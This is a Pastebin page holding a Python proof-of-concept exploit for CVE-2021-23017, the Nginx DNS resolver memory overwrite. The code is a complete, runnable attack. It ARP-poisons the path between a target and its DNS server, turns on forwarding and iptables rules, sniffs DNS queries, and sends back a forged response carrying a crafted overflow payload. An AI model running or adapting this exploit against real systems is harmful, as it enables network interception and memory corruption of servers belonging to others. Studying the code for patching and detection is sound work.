FlyFar

PoC for Nginx 0.6.18 - 1.20.0 Memory Overwrite Vulnerability CVE-2021-23017

Jan 2nd, 2024
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.80 KB | Cybersecurity | 0 0
  1. # This PoC is written by github.com/M507
  2. # Discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
  3. from scapy.all import *
  4. from multiprocessing import Process
  5. from binascii import hexlify, unhexlify
  6. import argparse, time, os
  7.  
  8. def device_setup():
  9.     os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
  10.     os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")
  11.  
  12. def ARPP(target, dns_server):
  13.     print("[*] Sending poisoned ARP packets")
  14.     target_mac = getmacbyip(target)
  15.     dns_server_mac = getmacbyip(dns_server)
  16.     while True:
  17.         time.sleep(2)
  18.         send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
  19.         send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)
  20.  
  21. def exploit(target):
  22.     print("[*] Listening ")
  23.     sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)
  24.  
  25. """
  26. RFC schema
  27. 0                   1                   2                   3
  28. 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
  29. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  30. |             LENGTH            |               ID              |
  31. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  32. |Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |
  33. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  34. |            ANCOUNT            |            NSCOUNT            |
  35. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  36. |            ARCOUNT            |               QD              |
  37. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  38. |               AN              |               NS              |
  39. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  40. |               AR              |
  41. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  42.  
  43. Fig. DNS                            
  44.  
  45. """
  46. def process_received_packet(received_packet):
  47.     if received_packet[IP].src == target_ip:
  48.         if received_packet.haslayer(DNS):
  49.             if DNSQR in received_packet:
  50.                 print("[*] the received packet: " + str(bytes_hex(received_packet)))
  51.                 print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
  52.                 try:
  53.                     # \/    the received DNS request
  54.                     dns_request = received_packet[DNS].build()
  55.                     null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
  56.                     print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
  57.                     print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
  58.                     payload = [
  59.                         dns_request[0:2],
  60.                         b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
  61.                         dns_request[12:null_pointer_index+1],
  62.                         dns_request[null_pointer_index+1:null_pointer_index+3],
  63.                         dns_request[null_pointer_index+3:null_pointer_index+5],
  64.                         b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
  65.                         b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",
  66.                         b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
  67.                         b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
  68.                     ]
  69.                    
  70.                     payload = b"".join(payload)
  71.                     spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
  72.                         UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
  73.                         payload)
  74.                     print("[+] dns answer: "+str(hexlify(payload)))
  75.                     print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))
  76.  
  77.                     sendp(spoofed_pkt, count=1)
  78.                     print("\n[+] malicious answer was sent")
  79.                     print("[+] exploited\n")
  80.                 except:
  81.                     print("\n[-] ERROR")
  82.  
  83. def main():
  84.     global target_ip
  85.     parser = argparse.ArgumentParser()
  86.     parser.add_argument("-t", "--target", help="IP address of the target")
  87.     parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
  88.     args = parser.parse_args()
  89.     target_ip = args.target
  90.     dns_server_ip = args.dns_server
  91.     device_setup()
  92.     processes_list = []
  93.     ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
  94.     exploitProcess = Process(target=exploit,args=(target_ip,))
  95.     processes_list.append(ARPPProcess)
  96.     processes_list.append(exploitProcess)
  97.     for process in processes_list:
  98.         process.start()
  99.     for process in processes_list:
  100.         process.join()
  101.  
  102. if __name__ == '__main__':
  103.     target_ip = ""
  104.     main()
Add Comment
Please, Sign In to add comment